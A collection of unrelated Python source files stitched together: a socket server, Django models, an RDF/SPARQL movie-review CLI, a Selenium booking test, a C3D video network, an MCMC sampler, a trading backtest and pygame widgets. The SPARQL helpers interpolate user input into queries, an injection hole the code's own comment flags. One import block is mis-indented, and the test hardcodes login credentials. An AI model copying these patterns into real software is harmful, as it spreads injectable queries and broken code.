logger = logging.getLogger("serverLogger")
logger.setLevel(logging.INFO)
fh = logging.FileHandler("server.log")
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', PORT))

threads = []
while True:
    sock.listen()
    clientsock, clientAddress, name = connection_with_auth(sock)
    # BUG FIX: connection_with_auth returns (None, None, None) on a failed
    # registration; the original passed that straight into ClientThread and
    # crashed on addr[0].  Also removed the unreachable `conn.close()` after
    # the loop, which referenced an undefined name.
    if clientsock is None:
        continue
    newthread = ClientThread(clientsock, clientAddress, name)
    threads.append(newthread)
    newthread.start()
|
from django.db import models
from django.contrib.auth.models import User, UserManager
#class User(models.Model):
# username=models.CharField(max_lenght=30)
# password=models.CharField(max_lenght=70)
# Email=models.models.EmailField(max_length=254)
class UserprofileInfo(models.Model):
    """Extra per-user profile data attached 1:1 to Django's auth User."""

    user = models.OneToOneField(User, on_delete=models.PROTECT)
    # NOTE(review): field name looks like a typo for "portfolio_site";
    # renaming would require a schema migration, so it is only flagged here.
    protfoils_site = models.URLField(blank=True)
    ready = models.BooleanField(default=True)
    pic = models.ImageField()

    def __str__(self):
        # Display the profile by its owning account's username.
        return self.user.username
import tkinter

# Minimal Tk demo: a greeting label and a red QUIT button that stops the loop.
root = tkinter.Tk()
greeting = tkinter.Label(root, text='Hello World!')
greeting.pack()
quit_button = tkinter.Button(root, text='QUIT', command=root.quit, bg='red', fg='white')
quit_button.pack(fill=tkinter.X, expand=1)
tkinter.mainloop()
|
# importamos lo necesario para el formato de la entrada
import datetime
import os
import sys
import re
import time
import numpy as np
try:
import imdb
except ImportError:
imdb = None
from tabulate import tabulate
from pprintpp import pprint
# blank node
# a ConjunctiveGraph is an aggregation of all the named graphs in a store.
from rdflib import BNode, ConjunctiveGraph, URIRef, Literal, Namespace, RDF
# importamos FOAF: viene del acronimo Friend Of Friend, el cual es utilizado para describir relacion entre personas tales como en una red social.
from rdflib.namespace import FOAF, DC
# On-disk N3 stores for movies and users, addressed as file:// URIs.
storefn = os.path.expanduser("~/movies.n3")
userfn = os.path.expanduser("~/users.n3")
storeuri = "file://" + storefn
useruri = "file://" + userfn
title_store = "Movie Theater"
title_user = "Fábrica de usuarios"
# Matches "title <http(s)://...>" movie lines.
r_cinema = re.compile(r"^(.*?) <(((https|http)?):((//)|(\\\\))+[\w\d:#@%/;$()~_?\+-=\\\.&]*)>$")
# Matches "nick <email@host>" new-user registration lines.
r_newuser = re.compile(r"^(.*?) <([a-z0-9_-]+(\.[a-z0-9_-]+)*@[a-z0-9_-]+(\.[a-z0-9_-]+)+)>$")
IMDB = Namespace("http://www.csd.abdn.ac.uk/~ggrimnes/dev/imdb/IMDB#")
# predicate: vocabulary for expressing reviews and ratings using RDF
REV = Namespace("http://purl.org/stuff/rev#")
# predicate: friendship relationship
REL = Namespace("https://www.perceive.net/schemas/20031015/relationship/")
class DoConjunctiveGraph:
    """Thin wrapper around an rdflib ConjunctiveGraph persisted as N3 on disk."""

    def __init__(self, pathfn, uri, title):
        self.title = title
        self.pathfn = pathfn
        self.uri = uri
        self.graph = ConjunctiveGraph()  # the graph instance
        if os.path.exists(self.pathfn):
            # Reload previously serialized triples from disk.
            # NOTE(review): Graph.load() was removed in rdflib 6 in favour
            # of parse() -- confirm the pinned rdflib version.
            self.graph.load(self.uri, format="n3")
        # Bind prefixes for the namespaces used when serializing.
        self.graph.bind("dc", DC)
        self.graph.bind("imdb", IMDB)
        self.graph.bind("rev", REV)

    def save(self):
        """Serialize the graph back to its file:// URI in N3 format."""
        self.graph.serialize(self.uri, format="n3")

    def len(self):
        # Count the number of triples in the graph.
        return self.graph.__len__()
def help():
    """Print a pointer to the Turtle blank-node documentation.

    NOTE: shadows the builtin help() within this module.
    """
    print("Revisar : https://www.w3.org/TR/turtle/#BNode")
class UserFactory(DoConjunctiveGraph):
    """Registry of users stored as FOAF triples, plus friendship relations.

    NOTE(review): the SPARQL helpers interpolate the nick with %-formatting,
    which is injectable if a nick can contain quotes -- nicknames come from
    r_newuser-validated input upstream, but confirm before exposing this.
    """

    def __init__(self, pathfn, uri, title):
        #self.title = "Fabrica de Usuarios"
        DoConjunctiveGraph.__init__(self, pathfn, uri, title)
        # Bind the additional namespaces this factory emits.
        self.graph.bind("foaf", FOAF)
        self.graph.bind("rel", REL)
        # Add the store's title triple on initialization.
        self.graph.add((URIRef(self.uri), DC["title"], Literal(self.title)))
        # self.save()

    def new_user(self, user_data=None):
        """Parse "nick <email>" per r_newuser, store the FOAF triples, save.

        Returns the nick so callers can use the serialized identity.
        """
        user_nick, user_email = (r_newuser.match(user_data).group(
            1), r_newuser.match(user_data).group(2))
        # Subject URIs are <store-uri>#<nick>, giving each user an identity.
        self.graph.add((URIRef(self.uri + "#%s" %
                        user_nick), RDF.type, FOAF["Person"]))
        self.graph.add((URIRef(self.uri + "#%s" % user_nick),
                        FOAF["nick"], Literal(user_nick)))
        self.graph.add((URIRef(self.uri + "#%s" % user_nick),
                        FOAF["mbox"], Literal(user_email)))
        # save() serializes the graph back to the n3 file.
        self.save()
        return user_nick

    def set_user_name(self, user_nick, user_name):
        """Attach a foaf:name to an already-registered nick; raises otherwise."""
        if not self.user_is_in(user_nick):
            raise Exception("El nick %s no está registrado" % user_nick)
        self.graph.add((URIRef(self.uri + "#%s" % user_nick),
                        FOAF["name"], Literal(user_name)))
        self.save()

    def set_friends(self, user_nick_me, user_nick_you):
        """Record a symmetric rel:friendOf pair; both nicks must exist."""
        if not (self.user_is_in(user_nick_me) and self.user_is_in(user_nick_you)):
            raise Exception("Algún amigo no está registrado")
        # Two triples: friendship is stored in both directions.
        self.graph.add((URIRef(self.uri + "#%s" % user_nick_you),
                        REL["friendOf"], URIRef(self.uri + "#%s" % user_nick_me)))
        self.graph.add((URIRef(self.uri + "#%s" % user_nick_me),
                        REL["friendOf"], URIRef(self.uri + "#%s" % user_nick_you)))
        print("Amistad establecida")
        self.save()

    def list_friends(self):
        """SPARQL: all (name, name) pairs connected by rel:friendOf."""
        return self.graph.query(
            """ SELECT ?aname ?bname
                WHERE {
                    ?a rel:friendOf ?b .
                    ?a foaf:name ?aname .
                    ?b foaf:name ?bname .
                }""")

    def list_users(self):
        """SPARQL: every distinct registered nick."""
        return self.graph.query(
            """ SELECT DISTINCT ?nick
                WHERE {
                    ?p foaf:nick ?nick .
                }""")

    def list_friends_of_nick(self, nick_user):
        """SPARQL: nicks that are rel:friendOf the given nick."""
        return self.graph.query(
            """ SELECT DISTINCT ?nick
                WHERE {
                    ?p foaf:nick "%s" .
                    ?p rel:friendOf ?q .
                    ?q foaf:nick ?nick .
                }""" % nick_user)

    def get_user_uri(self, user_nick):
        """Subject URI for a nick (<store-uri>#<nick>)."""
        return URIRef(self.uri + "#%s" % user_nick)
        # return self.graph.objects(URIRef(self.uri+"#felipeturing"), FOAF["name"])

    def user_by_nick(self, nick_user):
        """SPARQL: (nick, name, mbox) for the given nick."""
        return self.graph.query(
            """ SELECT ?nick ?name ?mbox
                WHERE {
                    ?p foaf:nick "%s" .
                    ?p foaf:nick ?nick .
                    ?p foaf:name ?name .
                    ?p foaf:mbox ?mbox .
                }""" % nick_user)

    def user_is_in(self, user_nick):
        # True when a foaf:Person triple for this nick is in the graph.
        return (URIRef(self.uri + "#%s" % user_nick), RDF.type, FOAF["Person"]) in self.graph
class Store(DoConjunctiveGraph):
    """Movie store: cinema info, IMDB movie metadata and rev: reviews."""

    def __init__(self, pathfn, uri, title):
        DoConjunctiveGraph.__init__(self, pathfn, uri, title)
        # Title triple for the store itself.
        self.graph.add((URIRef(self.uri), DC["title"], Literal(self.title)))

    def cinema(self, data=None):
        """With *data*, register the cinema parsed by r_cinema; else return its names."""
        if data is not None:
            # Fix: run the validating regex once instead of twice.
            match = r_cinema.match(data)
            name_cinema, web_cinema = match.group(1), match.group(2)
            cinema_uri = URIRef(self.uri + "#cinema")
            self.graph.add((cinema_uri, RDF.type, FOAF["Organization"]))
            self.graph.add((cinema_uri, FOAF["name"], Literal(name_cinema)))
            self.graph.add((cinema_uri, FOAF["weblog"], Literal(web_cinema)))
            self.save()
        else:
            return self.graph.objects(URIRef(self.uri + "#cinema"), FOAF["name"])

    def listmovies(self):
        """Return (uri, title) rows for every registered movie."""
        return self.graph.query(
            """ SELECT DISTINCT ?p ?title
                WHERE {
                ?p a imdb:Movie .
                ?p dc:title ?title .
                }""")

    def data_movie_by_uri(self, movie_uri):
        """Return (title, year) rows for one movie URI."""
        return self.graph.query(
            """ SELECT ?title ?year
                WHERE {
                <%s> dc:title ?title .
                <%s> imdb:year ?year .
                }""" % (movie_uri, movie_uri))

    def movie_uri_by_title(self, movie_title):
        """Return the URIs of movies with this exact dc:title (string interpolation)."""
        return self.graph.query(
            """ SELECT DISTINCT ?p
                WHERE {
                ?p dc:title "%s" .
                }""" % movie_title)

    def top_rated_movies(self, offset, limit, m):
        """Rank movies by IMDB weighted rating.

        weighted rating (WR) = (v/(v+m))*R + (m/(v+m))*C, where v is the review
        count, R the movie's mean rating, m the minimum review count and C the
        mean rating across all reviews.
        """
        C = self.graph.query(
            """ SELECT (AVG(?rating) as ?R)
                WHERE {
                ?url rev:hasReview ?review .
                ?review a rev:Review .
                ?review rev:rating ?rating .
                }""")
        C = float("%s" % list(C)[0])  # global mean rating across all reviews
        return self.graph.query(
            """ SELECT (?title AS ?pelicula)
                (COUNT(?review) AS ?v)
                (AVG(?rating) AS ?R)
                (
                (
                (COUNT(?review)/(COUNT(?review)+%d))*AVG(?rating) +
                (%d /(COUNT(?review)+%d))*%.4f
                )
                AS ?IMDbRating
                )
                WHERE {
                ?url rev:hasReview ?review .
                ?url dc:title ?title .
                ?review a rev:Review .
                ?review rev:rating ?rating .
                }
                GROUP BY ?title
                ORDER BY DESC(?IMDbRating)
                LIMIT %s
                OFFSET %s""" % (m, m, m, C, limit, offset))

    def new_movie(self, movie):
        """Store title, year, genres, directors and the two lead actors of an IMDbPY movie."""
        movieuri = URIRef("https://www.imdb.com/title/tt%s/" % movie.movieID)
        self.graph.add((movieuri, RDF.type, IMDB["Movie"]))
        self.graph.add((movieuri, DC["title"], Literal(movie["title"])))
        self.graph.add((movieuri, IMDB["year"], Literal(int(movie["year"]))))
        for genres in movie["genres"]:
            self.graph.add((movieuri, IMDB["genres"], Literal(genres)))
        for director in movie["director"]:
            self.graph.add((movieuri, IMDB["director"], Literal(director)))
        # Only the two top-billed cast members are recorded.
        for actor in (movie["cast"][0], movie["cast"][1]):
            self.graph.add((movieuri, IMDB["cast"], Literal(actor)))
        self.save()

    def movie_is_in(self, uri):
        """True when an imdb:Movie triple exists for this URI."""
        return (URIRef(uri), RDF.type, IMDB["Movie"]) in self.graph

    def new_review(self, user_uri, movie_id, date, rating, comment=None):
        """Attach a rev:Review (0-5 scale) by user_uri to movie movie_id."""
        review = BNode()  # @@ humanize the identifier (something like #rev-$date)
        review_uri = URIRef("%s#%s" % (self.uri, review))  # hoisted: built once
        movieuri = URIRef("https://www.imdb.com/title/tt%s/" % movie_id)
        self.graph.add((movieuri, REV["hasReview"], review_uri))
        self.graph.add((review_uri, RDF.type, REV["Review"]))
        self.graph.add((review_uri, DC["date"], Literal(date)))
        self.graph.add((review_uri, REV["maxRating"], Literal(5)))
        self.graph.add((review_uri, REV["minRating"], Literal(0)))
        self.graph.add((review_uri, REV["reviewer"], user_uri))
        self.graph.add((review_uri, REV["rating"], Literal(rating)))
        if comment is not None:
            self.graph.add((review_uri, REV["text"], Literal(comment)))
        self.save()

    def list_movies_user(self, user_uri):
        """Return the titles of every movie reviewed by user_uri."""
        return self.graph.query(
            """ SELECT DISTINCT ?title
                WHERE {
                ?p rev:reviewer <%s> .
                ?movie rev:hasReview ?p .
                ?movie dc:title ?title .
                }""" % user_uri)

    def movies_by_director(self, director_name):
        """Return (title, year) rows for movies by this director (interpolated)."""
        return self.graph.query(
            """ SELECT ?title ?year
                WHERE {
                ?movie imdb:director "%s" .
                ?movie imdb:year ?year .
                ?movie dc:title ?title .
                }""" % director_name)

    def movies_by_actor(self, actor_name):
        """Return (title, director, year) rows for movies featuring this actor."""
        return self.graph.query(
            """ SELECT ?title ?director ?year
                WHERE {
                ?movie imdb:cast "%s" .
                ?movie dc:title ?title .
                ?movie imdb:director ?director .
                ?movie imdb:year ?year .
                }""" % actor_name)

    def movie_by_url(self, url):
        """Return (title, year, director, cast) rows for one movie URL.

        Bug fix: the URI must be wrapped in angle brackets to form a valid
        SPARQL IRI term (as data_movie_by_uri already does); the previous
        version interpolated the bare URL and produced an invalid query.
        """
        return self.graph.query(
            """ SELECT ?title ?year ?director ?cast
                WHERE {
                <%s> a imdb:Movie .
                <%s> dc:title ?title .
                <%s> imdb:year ?year .
                <%s> imdb:director ?director .
                <%s> imdb:cast ?cast .
                }""" % (url, url, url, url, url))
def main(argv=None):
    """CLI entry point: dispatch on argv[1] to user/movie/review actions.

    Bug fixes relative to the original:
    - every interactive prompt was wrapped in ``eval(input(...))`` (a 2to3
      artifact): it evaluates whatever the user types — crashes on plain text
      and is an arbitrary-code-execution hole. Plain ``input()`` is used.
    - ``.encode("utf-8")`` before print (another 2to3 artifact) made Python 3
      print ``b'...'`` byte literals; the text is printed directly now.
    - bare ``except:`` clauses narrowed to the exceptions actually expected.
    """
    if not argv:
        argv = sys.argv
    u = UserFactory(userfn, useruri, title_user)
    s = Store(storefn, storeuri, title_store)
    if len(argv) > 1:
        if argv[1] in ("help", "--help", "h", "-h"):
            help()
        elif argv[1] == "newuser":
            nick_user = r_newuser.match(argv[2]).group(1)
            if u.user_is_in(nick_user):
                raise Exception(
                    "El nick %s ya se encuentra registrado" % nick_user)
            else:
                nick_registered = u.new_user(argv[2])
                try:
                    user_name = input("Nombre: ")
                    u.set_user_name(nick_registered, user_name)
                except Exception:
                    raise Exception(
                        "Error al registrar el nombre de %s" % nick_registered)
        elif argv[1] == "setfriends":
            u.set_friends(argv[2], argv[3])
        elif argv[1] == "triplesusersn3":
            print(u.len())
        elif argv[1] == "triplesmoviesn3":
            print(s.len())
        elif argv[1] == "listofusers":
            for user_name in u.list_users():
                print("%s" % str(user_name[0]))
        elif argv[1] == "userbynick":
            for data_user in u.user_by_nick(argv[2]):
                print(" Nick : %s\n Nombre : %s\n Email : %s" % data_user)
        elif argv[1] == "listoffriends":
            for data_friend in u.list_friends():
                print("%s es amig@ de %s" % data_friend)
        elif argv[1] == "myfriends":
            for nick_friend in u.list_friends_of_nick(argv[2]):
                print("%s" % nick_friend)
        elif argv[1] == "cinema":
            # Only one cinema may be registered (store file acts as the flag).
            if os.path.exists(storefn):
                print("Ya existe un cine registrado")
            else:
                s.cinema(argv[2])
        elif argv[1] == "newmovie":
            if argv[2].startswith("https://www.imdb.com/title/tt"):
                if s.movie_is_in(argv[2]):
                    print("La película ya se encuentra registrada")
                else:
                    i = imdb.IMDb()
                    # The numeric id sits between the tt prefix and a trailing slash.
                    movie = i.get_movie(
                        argv[2][len("https://www.imdb.com/title/tt"): -1])
                    print("Película : %s" % movie["title"])
                    print("Año : %s" % movie["year"])
                    print("Género : ", end=" ")
                    for genre in movie["genres"]:
                        print("%s" % genre, end=" ")
                    print("")
                    for director in movie["director"]:
                        print("Dirigida por: %s" % director["name"])
                    print("Actores principales:")
                    for actor in (movie["cast"][0], movie["cast"][1]):
                        print("%s como %s" % (actor["name"], actor.currentRole))
                    # Persist the movie header (title, year, type, director,
                    # genres and the two lead actors).
                    s.new_movie(movie)
            else:
                raise Exception(
                    "El formato de la película debe ser https://www.imdb.com/title/tt[id]/")
        elif argv[1] == "review":
            if not len(list(s.movie_uri_by_title(argv[3]))) == 0:
                movie_uri = "%s" % list(s.movie_uri_by_title(argv[3]))[0]
                # Silently does nothing when the reviewer or movie is unknown.
                if u.user_is_in(argv[2]) and s.movie_is_in(movie_uri):
                    user_uri = u.get_user_uri(argv[2])
                    movie_id = movie_uri[len(
                        "https://www.imdb.com/title/tt"): -1]
                    rating = None
                    print("Película : %s \t Año: %s" %
                          list(s.data_movie_by_uri(movie_uri))[0])
                    # Re-prompt until the rating is an int in (0, 5].
                    while not rating or (rating > 5 or rating <= 0):
                        try:
                            rating = int(input("Valoración (max 5): "))
                        except ValueError:
                            rating = None
                    date = None
                    # Re-prompt until the date parses as YYYY-MM-DD.
                    while not date:
                        try:
                            i = input("Fecha de visualización (YYYY-MM-DD): ")
                            date = datetime.datetime(
                                *time.strptime(i, "%Y-%m-%d")[:6])
                        except ValueError:
                            date = None
                    comment = input("Comentario: ")
                    s.new_review(user_uri, movie_id, date, rating, comment)
            else:
                print("Película no encontrada")
        elif argv[1] == "listofmovies":
            for movie in s.listmovies():
                print("%s - %s" % movie)
        elif argv[1] == "recommendtome":
            # Movies reviewed by the user's friends.
            for nick_friend in u.list_friends_of_nick(argv[2]):
                for movie_user in s.list_movies_user(u.get_user_uri(nick_friend)):
                    print(" %s" % movie_user)
        elif argv[1] == "topratedmovies":
            table = np.array(
                [["Película", "Número de reviews", "Valoración promedio(0-5)", "IMDb Rating"]])
            m = 2  # minimum reviews required to enter the top list
            for movie in s.top_rated_movies(argv[2], argv[3], m):
                if int(movie[1]) >= m:
                    table = np.append(table, [movie], axis=0)
            print(tabulate(np.delete(table, 0, axis=0),
                           table[0], tablefmt="fancy_grid", numalign="right", floatfmt=".1f"))
        elif argv[1] == "moviebydirector":
            for movie in s.movies_by_director(argv[2]):
                print("%s - %s" % movie)
        elif argv[1] == "moviebyactor":
            for movie in s.movies_by_actor(argv[2]):
                print("Título: %s\nDirector: %s\nAño:%s" % movie)
        elif argv[1] == "moviebyurl":
            print(s.movie_by_url(argv[2]))
        elif argv[1] == "usermovies":
            for movie in s.list_movies_user(u.get_user_uri(argv[2])):
                print("%s" % movie)
        else:
            print("Bandera no reconocida")
    else:
        print("Sin acciones")
if __name__ == "__main__":
    # The CLI needs IMDbPY to fetch movie metadata; `imdb` is presumably set
    # to a falsy value elsewhere when the import failed — verify at the import
    # site.
    if not imdb:
        raise Exception('This example requires the IMDB library! Install with "pip install imdbpy"')
    main()
"""
REMARK 1 :
from rdflib import Graph
g = Graph()
g.parse('dicom.owl')
q =
[poner 3 comillas] SELECT ?c WHERE { ?c rdf:type owl:Class .
FILTER (!isBlank(?c)) } [poner 3 comillas]
qres = g.query(q)
"""
"""
REMARK 2 :
weighted rating (WR) = (v ÷ (v+m)) × R + (m ÷ (v+m)) × C
Where:
R = average for the movie (mean) = (Rating)
v = number of votes for the movie = (votes)
m = minimum votes required to be listed in the Top 250 (currently 25,000)
C = the mean vote across the whole report
"""
"""
REMARK 3 :
References :
RDF 1.1 Turtle : https://www.w3.org/TR/turtle/
FOAF specification : http://xmlns.com/foaf/spec/
rdflib.graph.Graph : https://rdflib.readthedocs.io/en/stable/apidocs/rdflib.html#rdflib.graph.Graph
IMDB roles : https://imdbpy.readthedocs.io/en/latest/usage/role.html
SPARQL Query Language for RDF : https://www.w3.org/TR/rdf-sparql-query/#modDistinct
Querying with SPARQL : https://rdflib.readthedocs.io/en/stable/intro_to_sparql.html
Working with SPARQL : https://rdfextras.readthedocs.io/en/latest/working_with.html
""" |
from Lib.common.ConfigLoader import ConfigLoader
from Lib.common.DriverData import DriverData
from Lib.common.Log import Log
from Lib.temasekproperties.HomePage import HomePage
from Lib.temasekproperties.Listings import Listings
from Lib.temasekproperties.LogIn import LogIn
from Lib.temasekproperties.Resources import Resources
# Load test configuration and create the shared WebDriver instance.
cl = ConfigLoader()
createDriver = DriverData()
driver = createDriver.get_driver()
# Open the WordPress login page of the site under test.
driver.get("https://temasekproperties.com/wp-login.php")
log = Log(driver)
# Sign in with the test account.
li = LogIn(driver)
li.log_in("TestBS", "test123")
# Navigate from the home page to the resources-booking section.
hp = HomePage(driver)
hp.go_to_resources_booking()
#hp.go_to_listings()
rb = Resources(driver)
#l.search_for("Derbyshire")
# Book a specific resource and walk through the booking wizard.
rb.book("Central - Newton", "Derbyshire #22-01")
bookedFor = rb.booking_steps()
# Verify the new booking shows up under "booked" resources.
hp.go_to_resources_booked()
rb.check_if_exist("6 Derbyshire #22-01",bookedFor)
|
import math
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.utils.model_zoo as model_zoo
import pdb
__all__ = ['C3D', 'c3d_v1']
class C3D(nn.Module):
    """C3D video network: five 3D-conv stages followed by three FC layers.

    Takes a (batch, 3, sample_duration, sample_size, sample_size) clip and
    returns (batch, num_classes) logits.
    """

    def __init__(self,
                 sample_size,
                 sample_duration,
                 num_classes=400):
        super(C3D, self).__init__()

        def stage(in_ch, out_ch, pool, double=False):
            # One conv stage: conv(+conv) with ReLU, then 3D max-pooling.
            layers = [nn.Conv3d(in_ch, out_ch, kernel_size=3, padding=1),
                      nn.ReLU()]
            if double:
                layers += [nn.Conv3d(out_ch, out_ch, kernel_size=3, padding=1),
                           nn.ReLU()]
            layers.append(nn.MaxPool3d(kernel_size=pool, stride=pool))
            return nn.Sequential(*layers)

        self.group1 = stage(3, 64, (1, 2, 2))
        self.group2 = stage(64, 128, (2, 2, 2))
        self.group3 = stage(128, 256, (2, 2, 2), double=True)
        self.group4 = stage(256, 512, (2, 2, 2), double=True)
        self.group5 = stage(512, 512, (2, 2, 2), double=True)

        # Pooling shrinks time by 16x and space by 32x overall.
        final_t = int(math.floor(sample_duration / 16))
        final_s = int(math.floor(sample_size / 32))
        flat_features = 512 * final_t * final_s * final_s
        self.fc1 = nn.Sequential(
            nn.Linear(flat_features, 2048),
            nn.ReLU(),
            nn.Dropout(0.5))
        self.fc2 = nn.Sequential(
            nn.Linear(2048, 2048),
            nn.ReLU(),
            nn.Dropout(0.5))
        self.fc = nn.Sequential(
            nn.Linear(2048, num_classes))

    def forward(self, x):
        """Run the clip through all conv stages, flatten, then classify."""
        feats = x
        for block in (self.group1, self.group2, self.group3,
                      self.group4, self.group5):
            feats = block(feats)
        feats = feats.view(feats.size(0), -1)
        return self.fc(self.fc2(self.fc1(feats)))
def get_fine_tuning_parameters(model, ft_begin_index):
    """Build optimizer param groups that fine-tune only layers >= ft_begin_index.

    With ft_begin_index == 0 the whole model is returned; otherwise parameters
    whose name contains 'layer{ft_begin_index}'..'layer4' or 'fc' keep their
    learning rate, and every other parameter is frozen with lr=0.0.
    """
    if ft_begin_index == 0:
        return model.parameters()

    tuned_prefixes = ['layer{}'.format(idx) for idx in range(ft_begin_index, 5)]
    tuned_prefixes.append('fc')

    param_groups = []
    for name, param in model.named_parameters():
        if any(prefix in name for prefix in tuned_prefixes):
            param_groups.append({'params': param})
        else:
            # lr=0.0 keeps the parameter in the optimizer but frozen.
            param_groups.append({'params': param, 'lr': 0.0})
    return param_groups
def c3d_v1(**kwargs):
    """Construct a C3D model, forwarding all keyword arguments to C3D()."""
    return C3D(**kwargs)
"""
References
----------
[1] Tran, Du, et al. "Learning spatiotemporal features with 3d convolutional networks."
Proceedings of the IEEE international conference on computer vision. 2015.
""" |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import numpy as np
import scipy as sp
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
from multiprocessing import Pool
# Observed success counts out of 8 Bernoulli trials each.
y = np.array([4, 3, 4, 5, 5, 2, 3, 1, 4, 0, 1, 5, 5, 6, 5, 4, 4, 5, 3, 4])
# Bug fix: scipy.misc.comb was removed in SciPy 1.0; the supported location
# is scipy.special.comb (same signature, vectorized over arrays).
from scipy.special import comb
N_comb_y = comb(8, y)
def likelihood(q):
    """Binomial likelihood of the global data vector ``y`` (n=8) at probability ``q``."""
    per_point = N_comb_y * q ** y * (1 - q) ** (8 - y)
    return np.prod(per_point)
def update(old_param, old_value, step):
    """One Metropolis step: propose old_param +/- step and accept/reject.

    Returns (param, likelihood_of_param).

    Bug fix: the original always returned ``likelihood(candidate)`` even when
    the candidate was rejected, so the next step compared against the wrong
    likelihood and the chain state was corrupted. The returned value now
    always matches the returned parameter.
    """
    candidate = old_param + step * np.random.choice([-1, 1])
    candidate_value = likelihood(candidate)
    if candidate_value > old_value:
        return candidate, candidate_value
    # Accept the worse candidate with probability new/old.
    # NOTE(review): old_value == 0 would divide by zero here, as in the
    # original — acceptable only if the initial likelihood is nonzero.
    prob = candidate_value / old_value
    new_param = np.random.choice([candidate, old_param], p=[prob, 1.0 - prob])
    new_value = candidate_value if new_param == candidate else old_value
    return new_param, new_value
def iter_func(idx):
    """Run one Metropolis chain seeded by *idx*; return the post-burn-in samples."""
    np.random.seed(idx)
    step = 0.001
    max_iter = 10 ** 6
    # Random starting point on the step grid inside (0, 1).
    param = step * np.random.randint(1, 1 / step)
    value = likelihood(param)
    chain = [param]
    for _ in range(1, max_iter):
        param, value = update(param, value, step)
        chain.append(param)
    print("Iteration {} finished ... ".format(idx))
    # Discard the first 10**4 samples as burn-in.
    return chain[10 ** 4:10 ** 6]
def main():
    """Run 24 parallel Metropolis chains and plot the pooled posterior samples."""
    with Pool(24) as workers:
        chains = workers.map(iter_func, range(24))
    pooled = np.array(chains).flatten()
    sns.distplot(pooled, norm_hist=True)
    plt.savefig("hoge.pdf")
if __name__ == "__main__":
    # Bug fix: the timing loop below previously ran at module top level, so it
    # executed on every import — including inside the multiprocessing worker
    # processes spawned by main()'s Pool. It now runs only under the guard.
    main()
    means = []
    for i in range(10):
        start = time.perf_counter()
        main()
        end = time.perf_counter()
        print(f"elapsed time: {end-start} [s]")
        means.append(end - start)
    print(f"mean: {np.mean(means)} [s]")
|
import datetime
from django.db import models
class IssueManager(models.Manager):
    """Issue manager adding solving-time statistics for Issue instances."""

    def get_solved_issue_durations(self):
        """Return timedeltas (solved_on - created_on) for all solved issues."""
        return [
            issue.solved_on - issue.created_on
            for issue in self.model.objects.filter(solved=True)
        ]

    def humanize_timedelta(self, td):
        """Return *td* as a dict with 'hours', 'minutes' and 'seconds' keys.

        Bug fix: the previous version used ``td.seconds``, which only covers
        the within-day remainder and silently drops whole days; using
        ``total_seconds()`` folds days into the hour count.
        """
        total_seconds = int(td.total_seconds())
        hours, remainder = divmod(total_seconds, 3600)
        minutes, seconds = divmod(remainder, 60)
        return {
            'hours': hours,
            'minutes': minutes,
            'seconds': seconds,
        }

    def get_average_solving_time(self):
        """Return the mean solving time, humanized; zero when nothing is solved."""
        # XXX: Django's Avg aggregation would do this in SQL, but sqlite3
        # stores datetime fields as text, so the math is done in Python.
        durations = self.get_solved_issue_durations()
        if not durations:
            return self.humanize_timedelta(datetime.timedelta(0))
        # timedelta(0) as the start value makes sum() work on timedeltas.
        average = sum(durations, datetime.timedelta(0)) / len(durations)
        return self.humanize_timedelta(average)

    def get_longest_solving_time(self):
        """Return the longest solving time, humanized; zero when nothing is solved."""
        durations = self.get_solved_issue_durations()
        if not durations:
            return self.humanize_timedelta(datetime.timedelta(0))
        return self.humanize_timedelta(max(durations))

    def get_shortest_solving_time(self):
        """Return the shortest solving time, humanized; zero when nothing is solved."""
        durations = self.get_solved_issue_durations()
        if not durations:
            return self.humanize_timedelta(datetime.timedelta(0))
        return self.humanize_timedelta(min(durations))
|
# encoding: UTF-8
"""
展示如何执行策略回测。
"""
from __future__ import division
from vnpy.trader.app.ctaStrategy.ctaBacktesting import BacktestingEngine
from vnpy.trader.app.ctaStrategy.ctaBase import *
if __name__ == '__main__':
    from strategyBollBand import BollBandsStrategy
    # Create the backtesting engine.
    engine = BacktestingEngine()
    # Use bar (K-line) mode for this backtest.
    engine.setBacktestingMode(engine.BAR_MODE)
    # Select the historical database to read from.
    engine.setDatabase(MINUTE_DB_NAME)
    # Backtest date range; initHours (warm-up hours) defaults to 0.
    engine.setStartDate('20180731 06:00',initHours=1)
    engine.setEndDate('20180801 08:00')
    # Product/contract parameters.
    engine.setCapital(1000000)  # starting capital (default 1,000,000)
    engine.setSlippage(0.2)     # one tick of slippage for the index future
    engine.setRate(0.3/10000)   # commission rate: 0.3 per 10,000
    engine.setSize(300)         # contract multiplier
    engine.setPriceTick(0.2)    # minimum price increment
    # Reporting is disabled by default; files are written under the given folder.
    engine.setLog(True,"D:\\log\\")  # enable log and trade-report output
    engine.setCachePath("D:\\vnpy_data\\")  # local data-cache path (defaults to the user folder)
    # Instantiate the strategy inside the engine.
    d = {'symbolList':['tBTCUSD:bitfinex']}
    engine.initStrategy(BollBandsStrategy, d)
    # Run the backtest.
    engine.runBacktesting()
    # Show the results.
    engine.showBacktestingResult()
    engine.showDailyResult()
#!/usr/bin/env python
# -*-coding:utf-8-*-
import pygame
from pygame.locals import *
import copy
import pgwidth
import pgrect
import pgrect_window
import time
class rect:
    """Grid of clickable block widgets placed on a pgwidth window (Python 2)."""
    def __init__ (self,root,rt,ima_lo) :
        """Store the pygame root, the parent window *rt* and the block image path."""
        self. root = root
        self. rt = rt
        self. act = []           # block widgets created so far
        self. ima_lo = ima_lo    # image file used for every block
    def re_rect (self,n_rect=10,ima_ima=None ):
        """Create the full grid: 21 rows of (n_rect - 1) blocks each."""
        for y in range(1,22):
            self.dessi_1(n_rect,y)
        #0-38 39-
        # Indices of blocks meant to be disabled (feature currently commented out).
        self.dessin_off =[4,5,6,7,12,13,14,15,16,17,38,37,36,35,39,40]
        #for i in self.dessin_off:
        #    self.act[i].on =None
    def dessi_1 (self,n_rect,y):
        """Create one row of blocks at grid row *y*."""
        for i in range(1,n_rect):
            ""
            self.act.append( pgrect.rect(self.root,self.rt))
            self.act[-1]. size = [20,20]
            self.act[-1]. pos = [0+i*33,800-y*33]  # 33-px grid pitch, anchored at the bottom edge
            self.act[-1]. ima_load = self.ima_lo
            self.act[-1]. font_text = None
